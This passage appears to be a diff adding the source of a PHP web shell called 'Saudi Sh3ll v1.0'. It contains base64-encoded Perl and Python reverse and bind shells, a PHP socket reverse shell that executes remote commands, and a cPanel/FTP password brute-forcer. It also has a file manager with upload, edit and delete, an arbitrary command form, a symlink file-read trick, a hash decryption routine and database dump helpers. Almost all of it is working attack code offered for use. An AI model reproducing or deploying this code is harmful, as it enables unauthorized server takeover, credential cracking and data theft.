AgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwgOiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg==";
+
+$back_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
+$back_py = "IyEvdXNyL2Jpbi9lbnYgcHl0aG9uIC11DQoNCmltcG9ydCBzeXMsIHNvY2tldCwgb3MNCg0KaWYgbGVuKHN5cy5hcmd2KSAhPSAzOg0KIHByaW50ICJbeF0gVXNvOiAlcyBbaG9zdF0gW3BvcnRdIiAlIChzeXMuYXJndlswXSkNCmVsc2U6DQogaG9zdCA9IHN0cihzeXMuYXJndlsxXSkNCiBwb3J0ID0gaW50KHN5cy5hcmd2WzJdKQ0KIGhhbmRsZXIgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQogdHJ5Og0KICB0cnk6DQogICBpZiBvcy5mb3JrKCkgPiAwOiBvcy5fZXhpdCgwKQ0KICBleGNlcHQgT1NFcnJvciwgZXJyb3I6DQogICBwcmludCAnRXJyb3IgRW4gRm9yazogJWQgKCVzKScgJSAoZXJyb3IuZXJybm8sIGVycm9yLnN0cmVycm9yKQ0KICAgcGlkID0gb3MuZm9yaygpDQogICBpZiBwaWQgPiAwOg0KICAgIHByaW50ICdGb3JrIE5vIFZhbGlkbyEnDQogIGhhbmRsZXIuY29ubmVjdCgoaG9zdCwgcG9ydCkpDQogIG9zLmR1cDIoaGFuZGxlci5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0KICBvcy5kdXAyKGhhbmRsZXIuZmlsZW5vKCksIHN5cy5zdGRvdXQuZmlsZW5vKCkpDQogIHdoaWxlIGhhbmRsZXIucmVjdjoNCiAgIGhhbmRsZXIuc2VuZGFsbCgoJ1xuW1NhdWRpIFNoM2xsXSM+JykpDQogICBvcy5zeXN0ZW0oJy9iaW4vYmFzaCcpDQogZXhjZXB0Og0KICBwcmludCAiWyFdIEVycm9yIGNvbm5lY3Rpb24i";
+
+////////////////////////// php ///////////////////////
+if ($op == 'php')
+{
+
+$sockfd=fsockopen($ip , $port , $errno, $errstr );
+
+ if($errno != 0)
+        {
+            echo "$errno : $errstr";
+        }
+        else if (!$sockfd)
+        {
+               $result = "error connect!</p>";
+        }
+        else
+        {
+            fputs ($sockfd ,
+            "
+/################################\
+#                                #
+#      Saudi Sh3ll v1.0          #
+#                                #
+#        by al-swisre            #
+#                                #
+\################################/");
+         $pwd = shell_exec("pwd");
+         $sysinfo = shell_exec("uname -a");
+         $id = shell_exec("id");
+         $len = 1337;
+         fputs($sockfd ,$sysinfo . "\n" );
+         fputs($sockfd ,$pwd . "\n" );
+         fputs($sockfd ,$id ."\n\n" );
+         while(!feof($sockfd))
+         {
+            $cmdPrompt ="(Saudi sh3ll)[$]> ";
+            fputs ($sockfd , $cmdPrompt );
+            $command= fgets($sockfd, $len);
+            fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
+         }
+         fclose($sockfd);
+        }
+
+echo "End Connect";
+exit;
+}
+
+
+
+
+elseif ($op == 'perl')
+{
+
+
+op_sa("/tmp/sa.pl",$back_perl);
+			$out = cmd("perl /tmp/sa.pl ".$ip." ".$port." 1>/dev/null 2>&1 &");
+            sleep(1);
+			echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
+            unlink("/tmp/sa.pl");
+
+
+
+}
+
+
+
+elseif ($op == 'python')
+{
+
+
+op_sa("/tmp/sa.py",$back_py);
+			$out = cmd("python /tmp/sa.py ".$ip." ".$port." 1>/dev/null 2>&1 &");
+            sleep(1);
+			echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
+
+
+
+
+}
+
+}
+else if ($_POST['con'] == 'Connect bind'){
+/////////////////////// bind /////////////////////
+
+if ($op == 'perl')
+{
+
+
+
+$bind_port = $_POST['bind_port'];
+
+op_sa("/tmp/sa.pl",$bind_perl);
+			$out = cmd("perl /tmp/sa.pl ".$bind_port." 1>/dev/null 2>&1 &");
+            sleep(1);
+			echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
+            unlink("/tmp/sa.pl");
+
+
+
+}
+
+else if ($op == 'python')
+{
+
+
+$bind_port = $_POST['bind_port'];
+
+op_sa("/tmp/sa.py",$bind_py);
+			$out = cmd("python /tmp/sa.py ".$bind_port." 1>/dev/null 2>&1 &");
+            sleep(1);
+			echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
+            unlink("/tmp/sa.py");
+
+
+
+
+
+
+}
+
+
+
+
+
+
+}}
+
+
+
+
+
+break;
+
+////////////////////////////////////////// BruteForce  /////////////////////
+
+case 'brt':
+
+echo "<br /><br /><div class='cont3'><a href='$pg?sws=brt'>[ BruteForce ]</a></div><br />";
+
+
+
+if (!isset($_POST['bru']))
+{
+
+echo '<form method="post">
+
+<textarea name="user" cols="30" rows="15">userlist</textarea>
+<textarea name="pass" cols="30" rows="15">passlist</textarea><br /><br />
+target : <input type="text" name="trg" value="localhost" />&nbsp;&nbsp;&nbsp;
+<select name="op">
+<option value="cpanel">cpanel</option>
+<option value="ftp">ftp</option>
+</select><br /> <br />
+<input type="submit" name="bru" value="brute" />
+</form>';
+
+exit;
+}else
+{
+
+$users = $_POST['user'];
+$pass = $_POST['pass'];
+$option = $_POST['op'];
+$connect_timeout=5;
+@ini_set('memory_limit', 1000000000000);
+$target = $_POST['trg'];
+@set_time_limit(0);
+
+$userlist = explode ("\n" , $users );
+$passlist = explode ("\n" , $pass );
+
+foreach ($userlist as $user) {
+$_user = trim($user);
+foreach ($passlist as $password ) {
+$_pass = trim($password);
+if($option == "ftp"){
+ftp_check($target,$_user,$_pass,$connect_timeout);
+}
+if ($option == "cpanel")
+{
+cpanel_check($target,$_user,$_pass,$connect_timeout);
+}
+}
+}
+
+
+
+
+}
+
+
+
+
+
+
+break;
+
+
+///////////////////////////////////////////////////// about ///////////////////////////////////////////
+case 'ab':
+
+echo '<div class="hedr"> <img src="http://im15.gulfup.com/2012-02-03/1328281037731.png" alt="Saudi Shell" > </div><br /> ';
+echo "<div class='ab'><table cellpadding='5'  align='center'>";
+echo "<tr><td><b>Coded By :</b> al-swisre</td></tr>";
+echo "<tr><td><b>E-mail :</b> oy3@hotmail.com</td></tr>";
+echo "<tr><td><b>From :</b> Saudi Arabian</td></tr>";
+echo "<tr><td><b>Age :</b> 2/1995</td></tr>";
+echo "<tr><td><b>twitter :</b> <a  target='_blank'href='https://twitter.com/#!/al_swisre'>al_swisre</a></td></tr>";
+echo "<tr><td><b>S.Greetz 2 :</b> Mr.Alsa3ek - Ejram Hacker</td></tr>";
+echo "<tr><td><b>Greetz 2 :</b> e.V.E.L - G-B - kinG oF coNTrol - w0LF Gh4m3D - iNjeCt - abu halil 501 -  Mr.Pixy </td></tr><tr><td><b>And :</b> Mr.Black  - IraQiaN-r0x - Oxygen - locked - n4ss  .. and  All members of v4-team.com </td></tr></div>";
+
+exit;
+break;
+
+
+
+
+
+
+
+
+
+}
+
+
+
+
+
+
+
+
+}
+else
+{
+/////////// File Manager //////////////
+
+$sws = 'al-swisre' ;
+if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;}
+
+if(@$_GET['dir']){
+    $dir = $_GET['dir'];
+    if($dir != 'nullz') $dir = @cleandir($dir);
+}
+
+$curdir = @cleandir(@getcwd());
+$self = $_SERVER['PHP_SELF'];
+$me = $_SERVER['PHP_SELF'];
+
+if($dir=="") $dir = $curdir;
+    $dirx = explode(DIRECTORY_SEPARATOR, $dir);
+    $files = array();
+    $folders = array();
+    echo"<br /><div class='t33p'><table cellpadding='0' align='center' width='100%' >";
+    echo"<tr><td style=\"text-align: left\" >";
+    echo" Your path : &nbsp;";
+    for($i=0;$i<count($dirx);$i++){
+        @$totalpath .= $dirx[$i] . DIRECTORY_SEPARATOR;
+        echo("<a href='" . $me . "?dir=$totalpath" . "'>$dirx[$i]</a>" . DIRECTORY_SEPARATOR);
+    }
+    echo "<td></tr></table></div><br />";
+    echo"<div class='t3p'><table cellpadding='0' align='center' width='100%' >";
+    echo"<tr><td>Name</td><td>Size</td><td>Modify</td><td>Owner/Group</td><td>Permissions</td><td>Option<td></td></tr>";
+    if ($handle = @opendir($dir)) {
+        while (false != ($link = readdir($handle))) {
+               $on3 = @posix_getpwuid(@fileowner($dir."/".$link)) ;
+               $gr = @posix_getgrgid(@filegroup($dir."/".$link));
+            if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){
+                $file = array();
+                @$file['link'] = "<a href='$me?dir=$dir" . DIRECTORY_SEPARATOR . "$link'>[ $link ]</font></a>";
+                $file['pir'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
+                $file['pir2'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
+
+                $folder = "<tr><td> ".$file['link']."</td><td>dir</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?sws=rname&file=$link&dir=$dir'\">R</a> - <a href='?sws=chmod&file=$link&dir=$dir'\">C</a> - <a href='?sws=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
+
+                array_push($folders, $folder);
+            }
+            else{
+                $file = array();
+                $ext = @strpos($link, ".") ? @strtolower(end(explode(".", $link))) : "";
+                 $file['pir'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
+                 $file['pir2'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
+                 $file['size'] = @number_format(@filesize($dir."/".$link)/1024,2);
+                   @$file['link'] = "<a href='?sws=edit&file=$link&dir=$dir'\">".$link ."</a>";
+                 $file = "<tr><td>".$file['link']."</td><td>".$file['size']."</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?sws=edit&file=$link&dir=$dir'\">E</a> - <a href='?sws=rname&file=$link&dir=$dir'\">R</a> - <a href='?sws=chmod&file=$link&dir=$dir'\">C</a> - <a href='?sws=dow&file=$link&dir=$dir'\">D</a> - <a href='?sws=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
+                array_push($files, $file);
+            }
+
+        }
+         asort($folders);
+         asort($files);
+
+        foreach($folders as $folder) echo $folder;
+       foreach($files as $file) echo $file;
+        echo "</table></div>" ;
+        closedir($handle);
+
+
+}
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+}
+
+
+if ($_GET['sws'] == 'rname')
+{
+
+$dir = $_GET['dir'];
+
+$file = $_GET['file'];
+
+if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
+
+if (!isset($_POST['edit']))
+{
+
+echo "<br />
+<div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
+<a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div><br />
+dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
+<form method='post'>
+new name : <input type='text' value='$file' name='name'  /><br /><br />
+<input type='submit' value='edit' name='edit' />
+
+</form>
+
+ ";
+}else
+{
+
+$new = $_POST['name'];
+
+$rn = @rename ($dir."/".$file,$dir."/".$new);
+
+if(!$rn)
+{
+
+
+@cmd("cd $dir;mv $file $new ");
+
+
+}else
+{
+
+echo "<br /><br />Name change successfully";
+
+echo "<br /><br /><a href='?sws=rname&file=$new&dir=$dir'\">[ Back ]</a>";
+
+}
+
+
+
+}
+}
+
+
+
+
+
+if ($_GET['sws'] == 'chmod')
+{
+
+$dir = $_GET['dir'];
+
+$file = $_GET['file'];
+
+if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
+
+if (!isset($_POST['edit']))
+{
+
+echo "<br />
+<div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
+<a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div><br />
+dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
+<form method='post'>
+File to chmod: <input type='text' value=".$dir."/".$file." name='file' />&nbsp;&nbsp;&nbsp;<select name=\"ch\">
+<option value=\"755\">755</option>
+<option value=\"777\">777</option>
+<option value=\"644\">644</option>
+</select>
+<br /><br /><input type='submit' value='chmod' name='edit' />
+
+</form>
+
+ ";
+}
+else
+{
+
+$pir = $_POST['ch'];
+
+if ($pir == '755'
+)
+
+{
+   $cd = @chmod($_POST['file'],0775);
+}
+elseif ($pir == '777')
+       {
+   $cd = @chmod($_POST['file'],0777);
+
+       }
+elseif ($pir == '644')
+{
+
+$cd = $cd = @chmod($_POST['file'],0644);
+
+}
+
+if(!$cd)
+{
+echo "ERROR";
+
+}else
+{
+
+echo "changed Successfully";
+echo "<br /><br /><a href='?sws=chmod&file=$file&dir=$dir'\">[ Back ]</a>";
+
+
+}
+
+}
+}
+
+if ($_GET['sws'] == 'edit')
+{
+
+$file = $_GET['file'];
+$dir = $_GET['dir'];
+
+if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
+
+if (!isset($_POST['ed']))
+{
+
+$fil33 = @fopen($dir."/".$file, 'r');
+$content = @fread($fil33, @filesize($dir."/".$file));
+
+echo "
+<div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
+<a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div>
+<br />
+dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
+<form method=\"post\">
+<br /><textarea cols=\"85\" rows=\"25\" name=\"fil3\">";
+echo htmlentities($content) . "\n";
+echo '
+</textarea>
+<br /><br />
+<input type="submit" name="ed" value="Save !"/>
+</form>
+
+';
+
+}
+else
+{
+
+
+$oo = @fopen($dir."/".$file, 'w');
+      $ow =   @fwrite($oo, @stripslashes($_POST['fil3']));
+        @fclose($oo);
+        if (!$ow){echo "Error";}else {
+          echo header("Location: ?sws=edit&file=$file&dir=$dir");
+          }
+
+
+
+
+
+}
+
+
+
+
+}
+else if ($_GET['sws'] == 'dow')
+{
+$file = $_GET['file'];
+$dir = $_GET['dir'];
+
+@sa_download ($dir."/".$file);
+
+
+}
+/////////////////////////////////////////////////////
+if ($_GET['sws'] == 'rm')
+{
+
+$dir = $_GET['dir'];
+
+$file = $_GET['file'];
+
+if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
+
+if (!isset($_POST['edit']))
+{
+
+echo "<br />
+<div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
+<a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div>
+<br />
+dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
+<form method='post'>
+<input type='submit' value='Delete' name='edit' />
+
+</form>
+
+ ";
+}else
+{
+
+
+$rn = @unlink ($dir."/".$file);
+
+if(!$rn)
+{
+
+
+$rn = @rmdir ($dir."/".$file);
+
+
+
+}elseif (!$rn)
+{
+ $rn =  @cmd("cd $dir;rm $file");
+
+}
+else if (!$rn){@cmd ("cd $dir;rm -r $file");}
+else{
+
+echo header("Location: $pg?dir=$dir");
+}
+
+echo header("Location: $pg?dir=$dir");
+
+}
+}
+///////////////////////////////////////////////////////////////////////////////// mkdir //////////////////////////////
+
+else if ($_GET['sws'] == 'mkdir')
+{
+
+
+$dir = $_POST['dir'];
+$file = $_POST['n4me'];
+
+$mkdir = @mkdir ($dir."/".$file,0755);
+
+if (!$mkdir){@cmd ("mkdir $dir/$file ");}else {header("Location: $pg?dir=$dir"); }
+header("Location: $pg?dir=$dir");
+
+}
+
+
+else if ($_GET['sws'] == 'mkfile')
+{
+
+$dir = $_POST['dir'];
+$file = $_POST['n4me'];
+
+
+$mkdir = @fopen($dir."/".$file,'w');
+
+if (!$mkdir){@cmd ("touch $dir/$file ");}else {header("Location: $pg?dir=$dir"); }
+
+
+}
+
+else if ($_GET['sws'] == 'up')
+{
+
+
+$dir = $_POST['dir'];
+
+
+if(@move_uploaded_file($_FILES['upfile']['tmp_name'], $dir."/".$_FILES['upfile']['name'])) { header("Location: $pg?dir=$dir"); }
+	else { echo '<br /><br />Not uploaded !!<br><br>';exit; }
+
+}
+
+
+//////////////////////////// read file /////////////////////
+
+else if ($_GET['sws'] == 'rfile')
+{
+
+
+
+$file = $_POST['n4me'];
+
+echo "dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />  ";
+
+if (!isset($file)){$file = $_GET['dir']."/".$_GET['file'];}
+
+echo "<div>";
+
+$r3ad = @fopen($file, 'r');
+if ($r3ad){
+$content = @fread($r3ad, @filesize($file));
+echo "<pre>".htmlentities($content)."</pre>";
+}
+else if (!$r3ad)
+{
+echo "<pre>";
+$r3ad = @show_source($file) ;
+echo "</pre>";
+}
+else if (!$r3ad)
+{
+echo "<pre>";
+$r3ad = @highlight_file($file);
+echo "</pre>";
+}
+else if (!$r3ad)
+{
+echo "<pre>";
+$sm = @symlink($file,'sym.txt');
+
+
+if ($sm){
+$r3ad = @fopen('sym.txt', 'r');
+$content = @fread($r3ad, @filesize($dir."/".$file));
+echo "<pre>".htmlentities($content)."</pre>";
+}
+}
+
+echo "</div>";
+
+//////////////////////// cmd /////////////////////////////////
+
+
+}else if ($_GET['sws'] == 'cmd')
+{
+$cmd = $_POST['n4me'];
+$dir = $_POST['dir'];
+
+if (isset($cmd))
+{
+
+
+echo "<br /><textarea cols='65' rows='25' name='fil3'> ";
+
+echo @cmd("cd $dir;$cmd") ;
+
+echo " </textarea>";
+
+
+
+}
+
+
+
+
+}
+else if ($_GET['sws'] == 'site')
+{
+
+
+
+
+$read = @file_get_contents("http://networktools.nl/reverseip/$ips") ;
+
+$sit3 = @findit($read,"<pre>","</pre>");
+
+echo "<br /><div class='site'><pre> ";
+
+
+echo $sit3;
+
+echo "</pre> </div>";
+
+exit;
+
+
+}
+
+
+
+
+
+
+
+
+
+
+if(@$_GET['dir']){
+    $dir = $_GET['dir'];
+    if($dir != 'nullz') $dir = cleandir($dir);
+}
+
+echo "
+
+<br /><br />
+</div><div class='d0n'>
+<br /><br />
+<table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\"   >
+
+<tr><td><form method='GET''>
+Change dir : <br />
+<input type='text' name='name' value='$dir' size='25' />
+<input type='hidden'  name='dir' value='$dir' />
+
+<input type='submit' value='Go' />
+</form> </td>
+
+<td style=\"float: left\">  <form method='POST' action='$pg?sws=mkdir' >
+
+Make dir :<br />
+<input type='text' name='n4me' size='25' />
+<input type='hidden'  name='dir' value='$dir' />
+<input type='submit' value='Go' /></div>
+</form></td></tr>
+
+
+<tr><td><form method='post' action='$pg?sws=rfile'>
+read file : <br />
+<input type='text' name='n4me' size='25' />
+<input type='hidden'  name='dir' value='$dir' />
+<input type='submit' value='Go' />
+</form> </td>
+
+
+<td style=\"float: left\">  <form method='post'  action='$pg?sws=mkfile' >
+
+Make file :<br />
+<div style=\"text-align: right\">
+<input type='text' name='n4me' size='25' />
+<input type='hidden'  name='dir' value='$dir' />
+<input type='submit' value='Go' /></div>
+</form></td></tr>
+
+
+<tr><td><form method='POST' action='$pg?sws=cmd'>
+Execute : <br />
+<input type='text' name='n4me' size='25' />
+<input type='hidden'  name='dir' value='$dir' />
+<input type='submit' value='Go' />
+</form> </td>
+<b></b>
+
+
+<td style=\"float: left\">
+<form method='POST' enctype=\"multipart/form-data\" action='$pg?sws=up' >
+Upload file :<br />
+<div style=\"text-align: right\">
+<input type='file' name='upfile' value='Choose file' size='21' />
+<input type='hidden'  name='dir' value='$dir' />
+<input type='submit' value='Up' />
+</form></td></tr>
+
+
+
+</table>
+ </div>
+";
+//////////////////////////////////////// exit :d //////////////////////////
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+function cmd($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+
+function sa($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+
+
+
+function decrypt ($string,$cc_encryption_hash)
+{
+    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
+    $hash_key = _hash ($key);
+    $hash_length = strlen ($hash_key);
+    $string = base64_decode ($string);
+    $tmp_iv = substr ($string, 0, $hash_length);
+    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
+    $iv = $out = '';
+    $c = 0;
+    while ($c < $hash_length)
+    {
+        $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
+        ++$c;
+    }
+
+    $key = $iv;
+    $c = 0;
+    while ($c < strlen ($string))
+    {
+        if (($c != 0 AND $c % $hash_length == 0))
+        {
+            $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
+        }
+
+        $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
+        ++$c;
+    }
+
+    return $out;
+}
+
+
+function _hash ($string)
+{
+    $hash = (function_exists ('sha1')) ? sha1($string):md5($string);
+    $out = '';
+    $c = 0;
+    while ($c < strlen ($hash))
+    {
+        $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
+        $c += 2;
+    }
+    return $out;
+}
+
+function backup_tables($path,$host,$user,$pass,$name,$tables = '*')
+{
+
+  $link = @mysql_connect($host,$user,$pass);
+  @mysql_select_db($name,$link);
+
+  //get all of the tables
+  if($tables == '*')
+  {
+    $tables = array();
+    $result = @mysql_query('SHOW TABLES');
+    while($row = @mysql_fetch_row($result))
+    {
+      $tables[] = $row[0];
+    }
+  }
+  else
+  {
+    $tables = is_array($tables) ? $tables : explode(',',$tables);
+  }
+
+  //cycle through
+  foreach($tables as $table)
+  {
+    $result = mysql_query('SELECT * FROM '.$table);
+    $num_fields = mysql_num_fields($result);
+
+       $row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
+       $return.= "\n\n".$row2[1].";\n\n";
+
+    for ($i = 0; $i < $num_fields; $i++)
+    {
+      while($row = mysql_fetch_row($result))
+      {
+        $return.= 'INSERT INTO '.$table.' VALUES(';
+        for($j=0; $j<$num_fields; $j++)
+        {
+          $row[$j] = addslashes($row[$j]);
+          $row[$j] = ereg_replace("\n","\\n",$row[$j]);
+          if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
+          if ($j<($num_fields-1)) { $return.= ','; }
+        }
+        $return.= ");\n";
+      }
+    }
+    $return.="\n\n\n";
+  }
+
+  //save file
+  $handle = @fopen($path,'w+');
+  @fwrite($handle,$return);
+  @fclose($handle);
+}
+
+function search($string){
+    $q = mysql_query("SHOW TABLE STATUS");
+    $data = array();
+    while($table = mysql_fetch_array($q)){
+        $query = "SELECT * FROM $table[Name]";
+        $result = mysql_query($query);
+        $row = @mysql_fetch_assoc($result);
+        if(!$row){
+            continue;
+        }
+        $columns = array_keys($row);
+        $data[$table['Name']] = $columns;
+    }
+    $tables = array();
+    foreach($data as $table=>$columns){
+        $query = "SELECT * FROM `$table` WHERE ";
+        foreach($columns as $key=>$column){
+            if($key == 0){
+                $query .= "`$column` LIKE '%$string%'";
+            }else{
+                $query .= " OR `$column` LIKE '%$string%'";
+            }
+        }
+        $query = mysql_query($query);
+        $result = mysql_num_rows($query);
+        if($result > 0){
+            $tables[] = $table;
+        }
+    }
+    $founded = array();
+    foreach($tables as $table){
+        $columns = $data[$table];
+        foreach($columns as $column){
+            $query = "SELECT * FROM `$table` WHERE `$column` LIKE '%$string%'";
+            $query = mysql_query($query);
+            $result = mysql_num_rows($query);
+            if($result > 0){
+                $founded[] = array('table'=>$table,'column'=>$column);
+            }
+        }
+    }
+    return $founded;
+}
+
+    function cleandir($d){ // Function to clean up the $dir and $curdir variables
+    $d = @realpath($d);
+    $d = str_replace("\\\\", "\\", $d);
+    $d = str_replace("////", "//", $d);
+    return($d);
+}
+
+function wsoPermsColor($f) {
+	if (!@is_readable($f))
+		return '<font color=#FF0000>' . @wsoPerms(@fileperms($f)) . '</font>';
+	elseif (!@is_writable($f))
+		return '<font color=white>' . @wsoPerms(@fileperms($f)) . '</font>';
+	else
+		return '<font color=#25ff00>' . @wsoPerms(@fileperms($f)) . '</font>';
+}
+
+function wsoPerms($p) {
+	if (($p & 0xC000) == 0xC000)$i = 's';
+	elseif (($p & 0xA000) == 0xA000)$i = 'l';
+	elseif (($p & 0x8000) == 0x8000)$i = '-';
+	elseif (($p & 0x6000) == 0x6000)$i = 'b';
+	elseif (($p & 0x4000) == 0x4000)$i = 'd';
+	elseif (($p & 0x2000) == 0x2000)$i = 'c';
+	elseif (($p & 0x1000) == 0x1000)$i = 'p';
+	else $i = 'u';
+	$i .= (($p & 0x0100) ? 'r' : '-');
+	$i .= (($p & 0x0080) ? 'w' : '-');
+	$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
+	$i .= (($p & 0x0020) ? 'r' : '-');
+	$i .= (($p & 0x0010) ? 'w' : '-');
+	$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
+	$i .= (($p & 0x0004) ? 'r' : '-');
+	$i .= (($p & 0x0002) ? 'w' : '-');
+	$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
+	return $i;
+}
+
+function perm($file)
+{
+ if(file_exists($file))
+ {
+  return @substr(@sprintf('%o', @fileperms($file)), -4);
+ }
+ else
+ {
